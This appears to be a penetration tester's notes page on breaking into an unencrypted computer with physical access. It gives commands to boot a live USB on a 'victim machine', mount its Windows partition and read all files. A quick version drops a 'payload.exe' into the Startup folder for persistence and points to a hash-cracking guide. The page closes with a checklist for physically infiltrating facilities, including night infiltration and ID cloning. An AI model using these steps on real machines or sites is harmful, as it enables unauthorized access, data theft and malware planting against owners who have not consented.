Physical access to machine

So if you have physical access to a machine that is not encrypted it is really trivial to gain access to the hard-drive and all files on it.

This is how you do it

Create linux-usb

Just follow this guide for ubuntu
http://www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu

Boot into live-usb on victim machine

If the machine doesn't automatically detect the usb you might have to enter into the bios. This can usually be done by pressing F12 or F1 on boot. Bios looks different from machine to machine. But you need to just choose to boot from the USB-device.

Mount disk

Now you have booted into the live-usb, now we need to mount the hard-drive to the usb-linux-filesystem.
First we want to find out what partitions we have:

sudo su
fdisk -l

This will give you a list of partitions. They will look something like this

/dev/sda1
/dev/sda2

Identify from the list the partition you want to mount.

Here we create a space for where we want to mount the partition.

mkdir /media/windows

mount -t ntfs /dev/sda1 /media/windows

-tmeans type, and refers to the filesystem-type. And we choose ntfs which is the windows-filesystem.

Now you can access all the files from the harddrive in /media/windows

Umount the disk

Notice that is is umount and not unmount.

umount /media/windows

Quick Version

F12
mkdir /mnt/windows
ntfs-3g /dev/sda1 /mnt/windows -o force
cd /mnt/windows/windows
cd /users/[*]/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup
cd payload.exe -> ..../Startup

location of sploit
lib/live/mount/medium/tools/payload.exe

Dump the hashes

https://prakharprasad.com/windows-password-cracking-using-john-the-ripper/

Misc. Physical access to facilities:

Notes:

gates

fences

cameras

guard force

doors

badge requirements

hours

barriers

night infiltration

cover infiltration

id cloning

gather info on google maps

gather info on Linkedin

site owner sites may list / show pictures of common work space